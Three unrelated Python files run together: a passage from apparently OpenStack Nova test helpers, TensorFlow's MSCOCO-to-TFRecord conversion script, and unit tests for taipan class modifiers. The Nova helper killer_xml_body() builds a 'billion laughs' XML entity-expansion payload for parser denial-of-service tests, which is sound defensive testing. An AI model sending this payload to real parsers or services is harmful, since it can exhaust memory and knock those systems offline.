    if obj:
        instance = instance_obj.Instance(context, **test_instance)
        instance.create()
    else:
        instance = nova.db.instance_create(context, test_instance)
    return instance
def get_test_network_info(count=1):
    """Build a NetworkInfo holding ``count`` identical fake bridged VIFs."""
    ipv6 = CONF.use_ipv6
    fake = 'fake'
    fake_ip = '0.0.0.0'
    fake_vlan = 100
    fake_bridge_interface = 'eth0'
    def current():
        # One IPv4 subnet always; an IPv6 subnet is added when use_ipv6 is set.
        subnet_4 = network_model.Subnet(cidr=fake_ip,
                                        dns=[network_model.IP(fake_ip),
                                             network_model.IP(fake_ip)],
                                        gateway=network_model.IP(fake_ip),
                                        ips=[network_model.IP(fake_ip),
                                             network_model.IP(fake_ip)],
                                        routes=None,
                                        dhcp_server=fake_ip)
        subnet_6 = network_model.Subnet(cidr=fake_ip,
                                        gateway=network_model.IP(fake_ip),
                                        ips=[network_model.IP(fake_ip),
                                             network_model.IP(fake_ip),
                                             network_model.IP(fake_ip)],
                                        routes=None,
                                        version=6)
        subnets = [subnet_4]
        if ipv6:
            subnets.append(subnet_6)
        network = network_model.Network(id=None,
                                        bridge=fake,
                                        label=None,
                                        subnets=subnets,
                                        vlan=fake_vlan,
                                        bridge_interface=fake_bridge_interface,
                                        injected=False)
        vif = network_model.VIF(id='vif-xxx-yyy-zzz',
                                address=fake,
                                network=network,
                                type=network_model.VIF_TYPE_BRIDGE,
                                devname=None,
                                ovs_interfaceid=None)
        return vif
    # NOTE(review): xrange is Python 2 only.
    return network_model.NetworkInfo([current() for x in xrange(0, count)])
def is_osx():
    """Return True when running on Mac OS X (mac_ver reports a version)."""
    release = platform.mac_ver()[0]
    return release != ''
# Every MiniDNS handed out is remembered so cleanup can remove its files.
test_dns_managers = []
def dns_manager():
    """Create a MiniDNS manager and register it for later cleanup."""
    global test_dns_managers
    manager = minidns.MiniDNS()
    test_dns_managers.append(manager)
    return manager
def cleanup_dns_managers():
    """Delete the DNS files of every manager created via dns_manager()."""
    global test_dns_managers
    for manager in test_dns_managers:
        manager.delete_dns_file()
    test_dns_managers = []
def killer_xml_body():
    """Return a 'billion laughs'-style XML payload for parser DoS testing."""
    # Each entity expands the previous one; %(d)s triggers the blow-up.
    expansions = {
        'a': 'A' * 10,
        'b': '&a;' * 10,
        'c': '&b;' * 10,
        'd': '&c;' * 9999,
    }
    template = """<!DOCTYPE x [
<!ENTITY a "%(a)s">
<!ENTITY b "%(b)s">
<!ENTITY c "%(c)s">]>
<foo>
<bar>
<v1>%(d)s</v1>
</bar>
</foo>"""
    return (template % expansions).strip()
def is_ipv6_supported():
    """Best-effort check that this host can actually use IPv6.

    Combines the interpreter's compile-time flag, an AF_INET6 socket probe,
    and (on Linux) a check that at least one interface has an IPv6 address.
    """
    supported = socket.has_ipv6
    try:
        probe = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
        probe.close()
    except socket.error as err:
        if err.errno != errno.EAFNOSUPPORT:
            raise
        supported = False
    # check if there is at least one interface with ipv6
    if supported and sys.platform.startswith('linux'):
        try:
            with open('/proc/net/if_inet6') as ifaces:
                supported = bool(ifaces.read())
        except IOError:
            supported = False
    return supported
def get_api_version(request):
    """Extract the major API version digit from request.path.

    '/v2/servers' yields 2; returns None when the third character of the
    path is not a digit.
    """
    version_char = request.path[2:3]
    if version_char.isdigit():
        return int(version_char)
    return None
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
# Command-line configuration.  Paths default to the standard MSCOCO layout;
# shard counts match the train/val/test split described in the module docstring.
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
                       "Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
                       "Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
                       "Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json",
                       "Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
                        "Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
                        "Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
                        "Number of shards in testing TFRecord files.")
# Sentinel tokens added around every caption during tokenization.
tf.flags.DEFINE_string("start_word", "<S>",
                       "Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
                       "Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
                       "Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
                        "The minimum number of occurrences of each word in the "
                        "training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
                       "Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
                        "Number of threads to preprocess the images.")

FLAGS = tf.flags.FLAGS

# One metadata record per image; `captions` is a list (one entry per caption
# before sharding, exactly one entry after _process_dataset replicates images).
ImageMetadata = namedtuple("ImageMetadata",
                           ["image_id", "filename", "captions"])
class Vocabulary(object):
  """Simple vocabulary wrapper mapping word strings to integer ids."""

  def __init__(self, vocab, unk_id):
    """Initializes the vocabulary.

    Args:
      vocab: A dictionary of word to word_id.
      unk_id: Id of the special 'unknown' word.
    """
    self._vocab = vocab
    self._unk_id = unk_id

  def word_to_id(self, word):
    """Returns the integer id of a word string (unk_id for unknown words)."""
    return self._vocab.get(word, self._unk_id)
class ImageDecoder(object):
  """Helper class for decoding images in TensorFlow."""

  def __init__(self):
    # Create a single TensorFlow Session for all image decoding calls.
    self._sess = tf.Session()

    # TensorFlow ops for JPEG decoding; channels=3 forces RGB output.
    self._encoded_jpeg = tf.placeholder(dtype=tf.string)
    self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)

  def decode_jpeg(self, encoded_jpeg):
    """Decodes JPEG bytes into a 3-D (height, width, 3) image array.

    Raises tf.errors.InvalidArgumentError for invalid JPEG data, or
    AssertionError if the decoded result is not a 3-channel image.
    """
    image = self._sess.run(self._decode_jpeg,
                           feed_dict={self._encoded_jpeg: encoded_jpeg})
    assert len(image.shape) == 3
    assert image.shape[2] == 3
    return image
def _int64_feature(value):
  """Wrapper for inserting an int64 Feature into a SequenceExample proto."""
  int64_list = tf.train.Int64List(value=[value])
  return tf.train.Feature(int64_list=int64_list)
def _bytes_feature(value):
  """Wrapper for inserting a bytes Feature into a SequenceExample proto."""
  bytes_list = tf.train.BytesList(value=[str(value)])
  return tf.train.Feature(bytes_list=bytes_list)
def _int64_feature_list(values):
  """Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
  features = [_int64_feature(v) for v in values]
  return tf.train.FeatureList(feature=features)
def _bytes_feature_list(values):
  """Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
  features = [_bytes_feature(v) for v in values]
  return tf.train.FeatureList(feature=features)
def _to_sequence_example(image, decoder, vocab):
  """Builds a SequenceExample proto for an image-caption pair.

  Args:
    image: An ImageMetadata object holding exactly one caption.
    decoder: An ImageDecoder object used to sanity-check the JPEG data.
    vocab: A Vocabulary object.

  Returns:
    A SequenceExample proto, or None if the image is not valid JPEG.
  """
  # Fixed: read in binary mode ("rb", not "r").  JPEG data is raw bytes;
  # text mode corrupts it on platforms that translate line endings and
  # fails outright under Python 3.
  with tf.gfile.FastGFile(image.filename, "rb") as f:
    encoded_image = f.read()

  try:
    decoder.decode_jpeg(encoded_image)
  except (tf.errors.InvalidArgumentError, AssertionError):
    print("Skipping file with invalid JPEG data: %s" % image.filename)
    return

  context = tf.train.Features(feature={
      "image/image_id": _int64_feature(image.image_id),
      "image/data": _bytes_feature(encoded_image),
  })

  # _process_dataset replicates each image once per caption beforehand.
  assert len(image.captions) == 1
  caption = image.captions[0]
  caption_ids = [vocab.word_to_id(word) for word in caption]
  feature_lists = tf.train.FeatureLists(feature_list={
      "image/caption": _bytes_feature_list(caption),
      "image/caption_ids": _int64_feature_list(caption_ids)
  })
  sequence_example = tf.train.SequenceExample(
      context=context, feature_lists=feature_lists)

  return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
                         num_shards):
  """Processes and saves a subset of images as TFRecord files in one thread.

  Args:
    thread_index: Integer thread identifier within [0, len(ranges)].
    ranges: A list of pairs of integers specifying the ranges of the dataset to
      process in parallel.
    name: Unique identifier specifying the dataset.
    images: List of ImageMetadata.
    decoder: An ImageDecoder object.
    vocab: A Vocabulary object.
    num_shards: Integer number of shards for the output files.
  """
  # Each thread produces N shards where N = num_shards / num_threads. For
  # instance, if num_shards = 128, and num_threads = 2, then the first thread
  # would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  # Evenly split this thread's image range into per-shard sub-ranges.
  shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_dir, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)
    shard_counter = 0
    images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in images_in_shard:
      image = images[i]

      # Returns None for invalid JPEGs, which are silently skipped.
      sequence_example = _to_sequence_example(image, decoder, vocab)
      if sequence_example is not None:
        writer.write(sequence_example.SerializeToString())
        shard_counter += 1
        counter += 1

      # Periodic progress report (every 1000 written records).
      if not counter % 1000:
        print("%s [thread %d]: Processed %d of %d items in thread batch." %
              (datetime.now(), thread_index, counter, num_images_in_thread))
        sys.stdout.flush()
    writer.close()
    print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
        (datetime.now(), thread_index, counter, num_shards_per_batch))
  sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
  """Processes a complete data set and saves it as a TFRecord.

  Args:
    name: Unique identifier specifying the dataset.
    images: List of ImageMetadata.
    vocab: A Vocabulary object.
    num_shards: Integer number of shards for the output files.
  """
  # Break up each image into a separate entity for each caption.
  images = [ImageMetadata(image.image_id, image.filename, [caption])
            for image in images for caption in image.captions]

  # Shuffle the ordering of images. Make the randomization repeatable.
  random.seed(12345)
  random.shuffle(images)

  # Break the images into num_threads batches. Batch i is defined as
  # images[ranges[i][0]:ranges[i][1]].
  num_threads = min(num_shards, FLAGS.num_threads)
  spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
  ranges = []
  threads = []
  for i in xrange(len(spacing) - 1):
    ranges.append([spacing[i], spacing[i + 1]])

  # Create a mechanism for monitoring when all threads are finished.
  coord = tf.train.Coordinator()

  # Create a utility for decoding JPEG images to run sanity checks.
  # A single decoder (and its tf.Session) is shared by all threads.
  decoder = ImageDecoder()

  # Launch a thread for each batch.
  print("Launching %d threads for spacings: %s" % (num_threads, ranges))
  for thread_index in xrange(len(ranges)):
    args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
    t = threading.Thread(target=_process_image_files, args=args)
    t.start()
    threads.append(t)

  # Wait for all the threads to terminate.
  coord.join(threads)
  print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
        (datetime.now(), len(images), name))
def _create_vocab(captions):
  """Creates the vocabulary of word to word_id.

  The vocabulary is saved to disk in a text file of word counts. The id of each
  word in the file is its corresponding 0-based line number.

  Args:
    captions: A list of lists of strings.

  Returns:
    A Vocabulary object.
  """
  print("Creating vocabulary.")
  counter = Counter()
  for caption in captions:
    counter.update(caption)
  print("Total words:", len(counter))

  # Keep only words occurring at least min_word_count times, ordered by
  # descending frequency.
  word_counts = [item for item in counter.items()
                 if item[1] >= FLAGS.min_word_count]
  word_counts.sort(key=lambda item: item[1], reverse=True)
  print("Words in vocabulary:", len(word_counts))

  # Write out the word counts file ("<word> <count>" per line).
  with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
    lines = ["%s %d" % (word, count) for word, count in word_counts]
    f.write("\n".join(lines))
  print("Wrote vocabulary file:", FLAGS.word_counts_output_file)

  # Word ids are 0-based frequency ranks; the unknown id comes right after.
  vocab_dict = {}
  for word_id, (word, _) in enumerate(word_counts):
    vocab_dict[word] = word_id
  unk_id = len(word_counts)
  return Vocabulary(vocab_dict, unk_id)
def _process_caption(caption):
  """Processes a caption string into a list of tokenized words.

  Args:
    caption: A string caption.

  Returns:
    A list of strings; the tokenized caption, bracketed by the special
    start and end words.
  """
  words = nltk.tokenize.word_tokenize(caption.lower())
  return [FLAGS.start_word] + words + [FLAGS.end_word]
def _load_and_process_metadata(captions_file, image_dir):
  """Loads image metadata from a JSON file and processes the captions.

  Args:
    captions_file: JSON file containing caption annotations.
    image_dir: Directory containing the image files.

  Returns:
    A list of ImageMetadata.
  """
  with tf.gfile.FastGFile(captions_file, "r") as f:
    caption_data = json.load(f)

  # Extract the filenames.
  id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]

  # Extract the captions. Each image_id is associated with multiple captions.
  id_to_captions = {}
  for annotation in caption_data["annotations"]:
    image_id = annotation["image_id"]
    caption = annotation["caption"]
    id_to_captions.setdefault(image_id, [])
    id_to_captions[image_id].append(caption)

  # Sanity check: every listed image has captions and vice versa.
  assert len(id_to_filename) == len(id_to_captions)
  assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
  print("Loaded caption metadata for %d images from %s" %
        (len(id_to_filename), captions_file))

  # Process the captions and combine the data into a list of ImageMetadata.
  print("Processing captions.")
  image_metadata = []
  num_captions = 0
  for image_id, base_filename in id_to_filename:
    filename = os.path.join(image_dir, base_filename)
    captions = [_process_caption(c) for c in id_to_captions[image_id]]
    image_metadata.append(ImageMetadata(image_id, filename, captions))
    num_captions += len(captions)
  print("Finished processing %d captions for %d images in %s" %
        (num_captions, len(id_to_filename), captions_file))
  return image_metadata
def main(unused_argv):
  """Loads MSCOCO metadata, builds the vocabulary and writes all shards."""
  def _is_valid_num_shards(num_shards):
    """Returns True if num_shards is compatible with FLAGS.num_threads."""
    return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads

  # Each dataset's shard count must divide evenly among the worker threads.
  assert _is_valid_num_shards(FLAGS.train_shards), (
      "Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
  assert _is_valid_num_shards(FLAGS.val_shards), (
      "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
  assert _is_valid_num_shards(FLAGS.test_shards), (
      "Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")

  if not tf.gfile.IsDirectory(FLAGS.output_dir):
    tf.gfile.MakeDirs(FLAGS.output_dir)

  # Load image metadata from caption files.
  mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
                                                    FLAGS.train_image_dir)
  mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
                                                  FLAGS.val_image_dir)

  # Redistribute the MSCOCO data as follows:
  #   train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
  #   val_dataset = 5% of mscoco_val_dataset (for validation during training).
  #   test_dataset = 10% of mscoco_val_dataset (for final evaluation).
  train_cutoff = int(0.85 * len(mscoco_val_dataset))
  val_cutoff = int(0.90 * len(mscoco_val_dataset))
  train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
  val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
  test_dataset = mscoco_val_dataset[val_cutoff:]

  # Create vocabulary from the training captions only.
  train_captions = [c for image in train_dataset for c in image.captions]
  vocab = _create_vocab(train_captions)

  _process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
  _process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
  _process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
# Script entry point: tf.app.run() parses flags and then invokes main().
if __name__ == "__main__":
  tf.app.run()
| |
"""
Tests for .objective.modifiers module.
"""
import abc
from taipan.objective.base import Object
from taipan.functional.functions import const
from tests.test_objective.test_base import _UniversalBaseClass
import taipan.objective.modifiers as __unit__
# @abstract

class _Abstract(_UniversalBaseClass):
    """Shared assertions and fixtures for the @abstract modifier tests."""

    def _assertIsABC(self, class_):
        # An @abstract class should have ABCMeta (or a subclass) as metaclass.
        self.assertIsSubclass(type(class_), abc.ABCMeta)

    def _assertCantInstantiate(self, class_, *args, **kwargs):
        # Instantiation must fail with a TypeError whose message mentions
        # "instantiate" and names the offending class.
        with self.assertRaises(TypeError) as r:
            class_(*args, **kwargs)
        msg = str(r.exception)
        self.assertIn("instantiate", msg)
        self.assertIn(class_.__name__, msg)

    def _create_abstract_method_class(self, base, method=None):
        # Build an @abstract class deriving from *base* whose single abstract
        # method ``foo`` delegates to *method* (default: no-op).
        method = method or (lambda self: None)

        @__unit__.abstract
        class Foo(base):
            @__unit__.abstract.method
            def foo(self):
                return method(self)

        return Foo
class Abstract(_Abstract):
    """@abstract applied to things that are not classes must raise."""

    def test_none(self):
        self.assertRaises(TypeError, __unit__.abstract, None)

    def test_some_object(self):
        self.assertRaises(TypeError, __unit__.abstract, object())

    def test_function(self):
        with self.assertRaises(TypeError):
            @__unit__.abstract
            def foo():
                pass
class Abstract_StandardClasses(_Abstract):
    """Tests for @abstract modifier as applied to standard Python classes."""

    def test_class__empty(self):
        @__unit__.abstract
        class Foo(object):
            pass
        self._assertIsABC(Foo)
        self._assertCantInstantiate(Foo)

    def test_class__with_abstract_method(self):
        Foo = self._create_abstract_method_class()
        self._assertIsABC(Foo)
        self._assertCantInstantiate(Foo)

    def test_class__with_abstract_property(self):
        @__unit__.abstract
        class Foo(object):
            @__unit__.abstract.property
            def foo(self):
                pass
        self._assertIsABC(Foo)
        self._assertCantInstantiate(Foo)

    def test_inheritance__without_override(self):
        # Subclass that leaves the abstract method unimplemented is still
        # uninstantiable.
        Foo = self._create_abstract_method_class()
        class Bar(Foo):
            pass
        self._assertCantInstantiate(Bar)

    def test_inheritance__with_override(self):
        Foo = self._create_abstract_method_class()
        class Bar(Foo):
            def foo(self):
                pass
        Bar().foo()

    def test_inheritance__with_override__and_super_call(self):
        retval = 42
        Foo = self._create_abstract_method_class(method=const(retval))
        class Bar(Foo):
            def foo(self):
                return super(Bar, self).foo()
        # Fixed: use assertEqual, not the deprecated assertEquals alias.
        self.assertEqual(retval, Bar().foo())

    def test_inheritance_chain(self):
        Foo = self._create_abstract_method_class()
        @__unit__.abstract
        class Bar(Foo):
            pass
        self._assertIsABC(Bar)
        self._assertCantInstantiate(Bar)

    # Utility functions

    def _create_abstract_method_class(self, method=None):
        # Specialize the shared helper for plain ``object`` subclasses.
        return super(Abstract_StandardClasses, self) \
            ._create_abstract_method_class(base=object, method=method)
class Abstract_ObjectiveClasses(_Abstract):
    """Tests for @abstract modifier as applied to our 'objective' classes
    (descendants of :class:`taipan.objective.base.Object`).
    """
    def test_class__empty(self):
        @__unit__.abstract
        class Foo(Object):
            pass
        self._assertIsABC(Foo)
        self._assertCantInstantiate(Foo)

    def test_class__with_abstract_method(self):
        Foo = self._create_abstract_method_class()
        self._assertIsABC(Foo)
        self._assertCantInstantiate(Foo)

    def test_class__with_abstract_property(self):
        @__unit__.abstract
        class Foo(Object):
            @__unit__.abstract.property
            def foo(self):
                pass
        self._assertIsABC(Foo)
        self._assertCantInstantiate(Foo)

    def test_inheritance__without_override(self):
        Foo = self._create_abstract_method_class()
        class Bar(Foo):
            pass
        self._assertCantInstantiate(Bar)

    def test_inheritance__with_override__but_no_modifier(self):
        # Objective classes additionally require the @override modifier
        # when implementing an inherited method.
        Foo = self._create_abstract_method_class()
        with self._assertRaisesMissingOverrideException():
            class Bar(Foo):
                def foo(self):  # no ``@override``
                    pass

    def test_inheritance__with_override(self):
        Foo = self._create_abstract_method_class()
        class Bar(Foo):
            @__unit__.override
            def foo(self):
                pass
        Bar().foo()

    def test_inheritance__with_override__and_super_call(self):
        retval = 42
        Foo = self._create_abstract_method_class(method=const(retval))
        class Bar(Foo):
            @__unit__.override
            def foo(self):
                return super(Bar, self).foo()
        # Fixed: use assertEqual, not the deprecated assertEquals alias.
        self.assertEqual(retval, Bar().foo())

    def test_inheritance_chain(self):
        Foo = self._create_abstract_method_class()
        @__unit__.abstract
        class Bar(Foo):
            pass
        self._assertIsABC(Bar)
        self._assertCantInstantiate(Bar)

    # Utility functions

    def _create_abstract_method_class(self, method=None):
        # Specialize the shared helper for Object-derived subclasses.
        return super(Abstract_ObjectiveClasses, self) \
            ._create_abstract_method_class(base=Object, method=method)
# @final

class Final(_UniversalBaseClass):
    """@final applied to things that are not classes must raise."""

    def test_none(self):
        self.assertRaises(TypeError, __unit__.final, None)

    def test_some_object(self):
        self.assertRaises(TypeError, __unit__.final, object())

    def test_function(self):
        with self.assertRaises(TypeError):
            @__unit__.final
            def foo():
                pass
class Final_Classes(_UniversalBaseClass):
    """Tests for @final as applied to classes."""

    def test_class__incompatible(self):
        # A plain ``object`` base is rejected with ValueError
        # (only Object-derived classes work -- see _create_final_class).
        with self.assertRaises(ValueError):
            @__unit__.final
            class Foo(object):
                pass

    def test_class__compatible(self):
        self._create_final_class()

    def test_class__inherit_from_final__single_inheritance(self):
        Foo = self._create_final_class()
        with self._assertRaisesFinalInheritanceException(base=Foo):
            class Bar(Foo):
                pass

    def test_class_inherit_from_final__multiple_inheritance(self):
        # The final base is detected even when mixed with regular bases.
        FinalBase = self._create_final_class()
        class Foo(object):
            pass
        with self._assertRaisesFinalInheritanceException(base=FinalBase):
            class Bar(Foo, FinalBase):
                pass

    # Utility functions

    def _create_final_class(self):
        @__unit__.final
        class Foo(Object):
            pass
        return Foo
class Final_Methods(_UniversalBaseClass):
    """Tests for @final as applied to methods."""

    def test_method__normal__attempt_override(self):
        Base = self._create_class_with_final_method()
        with self._assertRaisesOverrideFinalException():
            class Foo(Base):
                @__unit__.override
                def florb(self):
                    pass

    def test_method__normal__attempt_hiding(self):
        # Redefining a final method WITHOUT @override is reported as
        # hiding rather than overriding.
        Base = self._create_class_with_final_method()
        with self._assertRaisesHideFinalException():
            class Foo(Base):
                def florb(self):
                    pass

    def test_method__override__attempt_further_override(self):
        # A @final @override method cannot be overridden again downstream.
        Foo = self._create_class_with_final_override_method()
        with self._assertRaisesOverrideFinalException():
            class Bar(Foo):
                @__unit__.override
                def florb(self):
                    pass

    def test_method__override__attempt_hiding(self):
        Foo = self._create_class_with_final_override_method()
        with self._assertRaisesHideFinalException():
            class Bar(Foo):
                def florb(self):
                    pass

    def test_method__reversed_final_and_override(self):
        """Test for 'reversed' application of @override and @final
        on a single method.

        This is 'reversed' in contrast to the recommended and more readable
        way of placing @final before @override, as mentioned by docs
        of the former. Nevertheless, the reversed way should still work.
        """
        class Base(Object):
            def florb(self):
                pass
        class Foo(Base):
            @__unit__.override
            @__unit__.final
            def florb(self):
                pass

        with self._assertRaisesOverrideFinalException():
            class Bar(Foo):
                @__unit__.override
                def florb(self):
                    pass
        with self._assertRaisesHideFinalException():
            class Bar(Foo):
                def florb(self):
                    pass

    # Utility functions

    def _create_class_with_final_method(self):
        # Base class exposing a plain @final method.
        class Base(Object):
            @__unit__.final
            def florb(self):
                pass
        return Base

    def _create_class_with_final_override_method(self):
        # Subclass whose override of florb is itself marked @final.
        class Base(Object):
            def florb(self):
                pass
        class Foo(Base):
            @__unit__.final
            @__unit__.override
            def florb(self):
                pass
        return Foo
# @override

class _Override(_UniversalBaseClass):
    """Shared fixtures for the @override modifier tests."""

    def _create_regular_class(self):
        # Base class NOT derived from taipan's Object.
        return self._create_class(base=object)

    def _create_objective_class(self):
        # Base class derived from taipan's Object.
        return self._create_class(base=Object)

    def _create_class(self, base):
        # Expose one instance, one class and one static method so every
        # kind of override can be exercised.
        class Class(base):
            def florb(self):
                pass
            @classmethod
            def class_florb(cls):
                pass
            @staticmethod
            def static_florb():
                pass
        return Class
class Override_Basics(_Override):
    """@override applied to things that are not methods must raise."""

    def test_none(self):
        self.assertRaises(TypeError, __unit__.override, None)

    def test_some_object(self):
        self.assertRaises(TypeError, __unit__.override, object())

    def test_regular_function(self):
        with self.assertRaises(TypeError):
            @__unit__.override
            def foo():
                pass
class Override_InstanceMethods(_Override):
    """Tests for @override on plain instance methods."""

    def test_instance_method__unnecessary(self):
        # @override on a method that overrides nothing is an error.
        with self._assertRaisesUnnecessaryOverrideException():
            class Foo(Object):
                @__unit__.override
                def foo(self):
                    pass

    def test_instance_method__missing(self):
        # Overriding an inherited method without @override is an error.
        Base = self._create_objective_class()
        with self._assertRaisesMissingOverrideException():
            class Bar(Base):
                def florb(self):
                    pass

    def test_instance_method__missing__hiding_method_from_regular_base(self):
        Base = self._create_regular_class()
        # even though the improperly overridden method comes from
        # a non-Object-inheriting base class, the presence of
        # another Object-inheriting base class should elicit the error
        with self._assertRaisesMissingOverrideException():
            class Bar(Base, Object):
                def florb(self):
                    pass

    def test_instance_method__present(self):
        Base = self._create_objective_class()
        class Bar(Base):
            @__unit__.override
            def florb(self):
                pass

    def test_instance_method__present__hiding_method_from_regular_base(self):
        Base = self._create_regular_class()
        class Bar(Base, Object):
            @__unit__.override
            def florb(self):
                pass
class Override_InstanceMethods_WithExplicitBase(_Override):
    """Tests for @override(base) with an explicitly specified base class,
    given either as a class object or as a dotted name string.
    """

    # Fully qualified name of taipan's universal base class.
    OBJECT_CLASSNAME = 'taipan.objective.base.Object'

    class InnerClass(object):
        # Used to test referring to a nested class by dotted name.
        def florb(self):
            pass

    def test_override_base__class_object__correct(self):
        Base = self._create_objective_class()
        class Bar(Base):
            @__unit__.override(Base)
            def florb(self):
                pass

    def test_override_base__class_object__incorrect(self):
        # Naming Object instead of the actual defining base is an error.
        Base = self._create_objective_class()
        with self._assertRaisesIncorrectOverrideBase(Object, correct=Base):
            class Bar(Base):
                @__unit__.override(Object)
                def florb(self):
                    pass

    def test_override_base__class_name(self):
        # we can use the universal base Object class itself to avoid
        # introducing another class in the global scope
        with self._assertRaisesUnnecessaryOverrideException():
            class Foo(Object):
                @__unit__.override(self.OBJECT_CLASSNAME)
                def foo(self):
                    pass

    def test_override_base__class_name__incorrect(self):
        Base = self._create_objective_class()
        with self._assertRaisesIncorrectOverrideBase(Object, correct=Base):
            class Bar(Base):
                @__unit__.override(self.OBJECT_CLASSNAME)
                def florb(self):
                    pass

    def test_override_base__class_name__inner_class(self):
        Base = self.InnerClass
        # Build the dotted path: module.OuterClass.InnerClass.
        classname = '.'.join([
            __name__, self.__class__.__name__, Base.__name__])
        class Bar(Base):
            @__unit__.override(classname)
            def florb(self):
                pass
class Override_ClassMethods(_Override):
    """Tests for @override on classmethods."""

    def test_class_method__unnecessary(self):
        with self._assertRaisesUnnecessaryOverrideException():
            class Foo(Object):
                @__unit__.override
                @classmethod
                def class_florb(cls):
                    pass

    def test_class_method__missing(self):
        Base = self._create_objective_class()
        with self._assertRaisesMissingOverrideException():
            class Foo(Base):
                @classmethod
                def class_florb(cls):
                    pass

    def test_class_method__missing__hiding_method_from_regular_base(self):
        Base = self._create_regular_class()
        # see comment in analogous test case for instance methods
        with self._assertRaisesMissingOverrideException():
            class Foo(Base, Object):
                @classmethod
                def class_florb(cls):
                    pass

    def test_class_method__present(self):
        Base = self._create_objective_class()
        class Foo(Base):
